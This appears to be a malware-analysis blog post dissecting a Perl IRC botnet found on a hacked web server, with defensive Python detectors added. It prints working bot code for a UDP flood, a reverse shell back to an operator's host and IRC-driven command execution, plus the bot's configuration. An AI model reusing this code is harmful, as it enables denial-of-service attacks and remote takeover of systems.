        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
    } else {
        sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002");
    }
}
[...]
UDP For Flood:
[...]
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
    return unless $pacotes;
    socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
    my $alvo=inet_aton("$1");
    my $porta = "$2";
    my $tempo = "$3";
    my $pacote;
    my $pacotese;
    my $fim = time + $tempo;
    my $pacota = 1;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Get BOMbs)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
    while (($pacota == "1") && ($pacotes == "1")) {
        $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
        $pacote=$rand x $rand x $rand;
        $porta = int(rand 65000) +1 if ($porta == "0");
        send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
    }
    if ($xstats) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Send\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");
    }
}
[...]
Backdoor, the "BackConnect"
# Backconnect
# (analyst note: classic reverse shell; the socket is dup'ed onto STDIN,
#  STDOUT and STDERR and an interactive /bin/sh is spawned on top of it.
#  Note also the hidden working directory /tmp/.mrx)
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
    my $host = "$1";
    my $porta = "$2";
    my $proto = getprotobyname('tcp');
    my $iaddr = inet_aton($host);
    my $paddr = sockaddr_in($porta, $iaddr);
    my $shell = "/bin/sh -i";
    if ($^O eq "MSWin32") {
        $shell = "cmd.exe";
    }
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
    connect(SOCKET, $paddr) or die "connect: $!";
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    open(STDERR, ">&SOCKET");
    system("$shell");
    system("cd /tmp/.mrx");
    close(STDIN);
    close(STDOUT);
    close(STDERR);
[...]
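The "back" handler above dup's the connected socket onto STDIN, STDOUT and STDERR and then spawns "/bin/sh -i", which leaves a recognisable footprint on a Linux host: a shell or perl process whose three standard streams all resolve to the same socket inode. The Python below is an added example of checking /proc for exactly that layout; it is not code from the post or from the bot, and the list of shell-like process names and the "/tmp/." working-directory hint are assumptions made for the illustration.

```python
import os
import re

# Added example (not code from the post or the bot). The bot's "back" command
# re-opens STDIN/STDOUT/STDERR onto the connected SOCKET and runs "/bin/sh -i",
# so the perl process and its sh child both end up with fds 0, 1 and 2 pointing
# at one socket inode. We look for that layout in /proc.

SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")

# Assumption: interpreters and shells that should never take commands from a
# socket on a web server. Extend to taste.
SHELL_LIKE = {"sh", "bash", "dash", "ash", "ksh", "zsh", "perl", "php", "python", "python3"}


def std_streams_on_socket(fd_targets):
    """fd_targets maps fd number -> readlink() of /proc/<pid>/fd/<fd>, or None
    when the link could not be read. True when fds 0, 1 and 2 are all sockets."""
    return all(
        fd_targets.get(fd) is not None and SOCKET_LINK.match(fd_targets[fd]) is not None
        for fd in (0, 1, 2)
    )


def same_socket(fd_targets):
    """The bot dup's one SOCKET onto all three streams, so the inodes are identical."""
    return len({fd_targets.get(fd) for fd in (0, 1, 2)}) == 1


def classify_process(comm, fd_targets):
    """Verdict for one process, or None when nothing stands out.
    'backconnect-shell': shell/interpreter whose stdio is a single socket (strong).
    'socket-stdio':      any other process with socket stdio; inetd-style
                         children legitimately look like this, so it is a lead."""
    if not std_streams_on_socket(fd_targets):
        return None
    if comm in SHELL_LIKE and same_socket(fd_targets):
        return "backconnect-shell"
    return "socket-stdio"


def hidden_tmp_cwd(cwd):
    """Weak extra hint: the sample does `cd /tmp/.mrx`; a dot-directory under
    /tmp as a process working directory deserves a look."""
    return bool(cwd) and re.match(r"^/tmp/\.[^/]+", cwd) is not None


def read_fd_targets(pid):
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:  # process gone, or not readable without root
            targets[fd] = None
    return targets


def scan_proc():
    """Walk /proc on the local host; returns [(pid, comm, verdict, cwd)].
    Run as root, otherwise only your own processes are inspectable."""
    findings = []
    if not os.path.isdir("/proc"):
        return findings
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue
        try:
            cwd = os.readlink(f"/proc/{pid}/cwd")
        except OSError:
            cwd = None
        verdict = classify_process(comm, read_fd_targets(pid))
        if verdict or hidden_tmp_cwd(cwd):
            findings.append((pid, comm, verdict, cwd))
    return findings


if __name__ == "__main__":
    for pid, comm, verdict, cwd in scan_proc():
        print(f"pid={pid} comm={comm} verdict={verdict} cwd={cwd}")
```

Treat "backconnect-shell" as the strong signal and "socket-stdio" as a lead to verify: services spawned by inetd or systemd socket activation also have sockets on their standard streams, while a web server's worker processes normally have /dev/null on fd 0 and log files or pipes on 1 and 2. Pair the check with the owning user (www-data or the FTP user of the hacked blog) and the peer address of the socket from /proc/net/tcp for the full picture.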
Shell..
# (analyst note: arbitrary command execution from the IRC channel; the
#  double fork detaches the command and its output is relayed back line by
#  line, throttled by $linas_max)
sub shell {
    return unless $shellaccess;
    my $printl=$_[0];
    my $comando=$_[1];
    if ($comando =~ /cd (.*)/) {
        chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
        return;
    } elsif ($pid = fork) {
        waitpid($pid, 0);
    } else {
        if (fork) {
            exit;
        } else {
            my @resp=`$comando 2>&1 3>&1`;
            my $c=0;
            foreach my $linha (@resp) {
                $c++;
                chop $linha;
                sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
                if ($c >= "$linas_max") {
                    $c=0;
[...]
Preview video of the other hack toolkit packages used (evidence of the crime)
I cannot discuss the other toolkits found, for I am running out of time to write... there are so many of them! But those tools really explain a lot of details about what the MO of the hack is: you will see many tool-sets with ELF binaries inside, some of them Open Source software being misused for this malicious purpose. To give a good overview of the other tools used, I tried to open the archives of those hack-tool packages one by one and recorded it in a video for you to view safely:
Who is the attacker?
The attack itself is controlled by a bad actor hiding behind an IRC connection. Below I disclose the IRC configuration used by this case's attacker; it contains the IRC server's IP, the user's ID, the IRC channel, and the nicknames/handles used for conducting the attack. It is a check-mate:
my @xname = ("Googurl (C) 2006 xeQt","www.Google.com","* Im to lame to read Bitchx.doc *","BiatchX",
"Tveita Gjengen","Bgjengen","Agjengen","locos","putas","spooon","Type-R Turbo","Civic R Turbo",
"mIRC 6.1","* Im so lame i cant ready BitchX.doc *","Bill Gates","Cannon","Mtv","nos","nozzz",
"Sport Crew","vTeam","Turbo","random","paypal","netscam","www.milw0rm.com","lee","av","freace",
"trojan donkey","Monster Garage","Garage Inc.","Pimp Ma Shit","Pimp my ride","Freak out","Doch",
"www.packetstormsecurity.org","www.linux.com","www.freebsd.org","Hello There","tyson","mekkkka",
"Im just myself man","Can u get the clue?","Im not the only one","Fear the lions","mekka","nooo",
"Dragons back","Turbo Quattro","Sport Quattro","aheh goofy","Just for phun","gBill","goa","Yesir",
"Thats my mofo name","Snoooop Doggy Style...","Tricky Trickey","love, peace, and xeQt","rbot","ha",
"Clap your hands","one two tree, bass","lions","Drugs, sex, and xtc","i hate that biatch","ali",
"Go fuck yourself","whois meeee","Fatjoe Corp","Brooklyn Bounche","Dj Pulsedriver","lee","furu",
"Random","You have no clue","This rocks","uranium","BinLaden","Ted Bundy","Charlie Cheeens","hans",
"Will Smith","Freash Prince On IRC","Freash prince in bel air","Powered By PHPBB","mambo","ruy",
"dj pulse","Powered By xeQt","Delux","2pac","Biggie","Fuck sadam","Allah","Im your god idiot","id",
"Im to lame to read BitchX.doc","Boika","Diamonds","Jean claude Van dame","Arnold Schwartsneger",
"Stig","Anothony","White Power","Just do it","vSmotor vs. Turbo","Nismo Skyline GT-R R34","MySquad",
"Honda Civic Type-R","Maria Carrey","Terror Squad","I'm to lame to read BitchX.doc","w33d","hugo",
"WinXP 1999 (C) Bill Gates","Microsoft windows xeQtxpress","xeQt vS Mrx Team","Apache httpd server",
"arne","line","geir","terje","synne","linda","frode","my name?","teamrxPress","xeqters","asus power",
"Crash Test Dummy","Madonna","vX power","Team Windows","Bill Gates","Bill Gatez","Thats my girl...",
"Phunter","panter","Snaked","Hunted","Victums","PHPSH","mod_com_xQt","com_xeQter","com_team","assa",
"Nokia, Connecting People...","BitchX","smoke and fly","com_xeQt_Performance","TeaMrx Performance",
"xQt","Perlbot version vx9m0d v3","Googurl","Google lovers","xeQt_com","mrx_unit","com_asus","haist",
"TeaMrx Crew","xQt vS TeaMrx","xeQt vS Mrx","Powered by TeaMrx","Powered by xQt","com_xQt_mrx","com_x",
"com_teamrx","xeQt the way to go","Perl monks","perlhackers","perl genius","perl team","perl scanner",
"San Francisco","New York Gangbang..","Team Norway","Team Europe","Team Germany","Team Work","jet lie");
#################
# Random Ports
#################
my @rports = ("6667");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 - he tries to tell me what I put inside of me - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1キ9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
[...]
# xeQt
#my $nick = "bq";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'PowerBots (C) GohacK';
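The snippets quoted in this post, from the port scanner and the UDP/backconnect/shell handlers down to the nick, port and CTCP VERSION configuration above, carry a number of fixed strings that do not change between drops of this bot, which makes a quick string-based triage of a compromised web root practical. The Python below is an added example of such a scanner, not code from the post; the regexes are built only from strings visible in the quoted code, while the weights, the threshold and the two embedded sample files are constructed for the demonstration.

```python
import os
import re

# Added example, not code from the post. Each indicator is a regex over a
# string that appears in the bot source quoted in the post. Weights and the
# threshold are my own choices: one strong indicator, or several weak ones,
# is enough to pull a file out for manual review.
INDICATORS = {
    # name: (regex, weight)
    "irc_sendraw":        (re.compile(r"sendraw\(\$IRC_cur_socket"), 1),
    "irc_privmsg":        (re.compile(r"PRIVMSG \$printl"), 1),
    "irc_port_6667":      (re.compile(r'@rports\s*=\s*\("6667"\)'), 1),
    "ctcp_version_spoof": (re.compile(r"\\001mIRC"), 1),
    "actor_tags":         (re.compile(r"xeQt|TeaMrx|Perlbot version"), 1),
    "tcp_connect_scan":   (re.compile(r"IO::Socket::INET->new\(PeerAddr\s*=>.*Proto\s*=>\s*'tcp'"), 1),
    "udp_raw_socket":     (re.compile(r"socket\(\w+,\s*PF_INET,\s*SOCK_DGRAM,\s*17\)"), 4),
    "backconnect_dup":    (re.compile(r'open\(STD(?:IN|OUT|ERR),\s*">&SOCKET"\)'), 4),
    "interactive_sh":     (re.compile(r"/bin/sh -i"), 3),
    "hidden_tmp_dir":     (re.compile(r"/tmp/\.mrx"), 3),
}
THRESHOLD = 5


def scan_text(text):
    """Return {indicator: match_count} for every indicator present in text."""
    hits = {}
    for name, (rx, _) in INDICATORS.items():
        n = len(rx.findall(text))
        if n:
            hits[name] = n
    return hits


def score(text):
    """Presence-based score: each indicator counts once, weighted, so a file
    that repeats one weak string cannot outrank one real backconnect."""
    return sum(INDICATORS[name][1] for name in scan_text(text))


def is_suspicious(text):
    return score(text) >= THRESHOLD


def scan_tree(root, max_bytes=2_000_000):
    """Scan every regular file under root (the web root, /tmp and /var/tmp
    are the usual places); returns [(path, score, hits)], highest score first."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = scan_text(text)
            if hits:
                findings.append((path, score(text), hits))
    return sorted(findings, key=lambda f: f[1], reverse=True)


# Constructed samples for a self-test: a harmless Perl client that happens to
# use IO::Socket::INET, and a fragment assembled from the quoted bot code.
SAMPLE_BENIGN = r'''#!/usr/bin/perl
use IO::Socket::INET;
my $s = IO::Socket::INET->new(PeerAddr => "localhost", PeerPort => 80, Proto => 'tcp');
print $s "GET / HTTP/1.0\r\n\r\n";
'''

SAMPLE_BOT = r'''# Backconnect
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
    my $shell = "/bin/sh -i";
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
    open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET");
    system("$shell"); system("cd /tmp/.mrx");
}
my @rports = ("6667");
my @Mrx = ("\001mIRC v6.2 Khaled Mardam-Bey\001");
'''

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, sc, hits in scan_tree(root):
        flag = "SUSPICIOUS" if sc >= THRESHOLD else "weak"
        print(f"{flag:10} {sc:3} {path} {hits}")
```

The benign client trips only the weak "tcp_connect_scan" pattern and scores 1, while the bot fragment collects the backconnect, interactive shell and hidden-directory indicators and scores well above the threshold. Because the bot is dropped as a plain file (often without a .pl extension, and sometimes inside a PHP file as the post's functions.php case shows), the walker deliberately reads every file rather than filtering by extension; raise THRESHOLD or drop the weak patterns if your own Perl code base produces noise.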
[...]
Moral of the story
1. Attacks that seem to come from country AAA might not really be coming from AAA; please be careful about this.
2. What was stated/written as "Romanian Hacker/AntiSec" actually had the taste of skids from ANOTHER territory to me, judging by some keywords that were modified in the source code of the attacker's script and the other attack tools, and after checking deeper into their IRC channel.
3. Harden your web server, and if you use an old PHP... #PatchNow!
Kudos to the team work!
MalMouse explains in his blog HOW WIDE the target of these attacks is:
We are uploading the sample via FTP for Law Enforcement evidence collection and security research purposes only. We don't share the sample with requesters using a private address or a Twitter account, so please prepare your FTP account and contact us via this post's comment section (not to be published!), mentioning your real name, your entity and an email address for the reply. Thank you in advance. Below is the archive snapshot: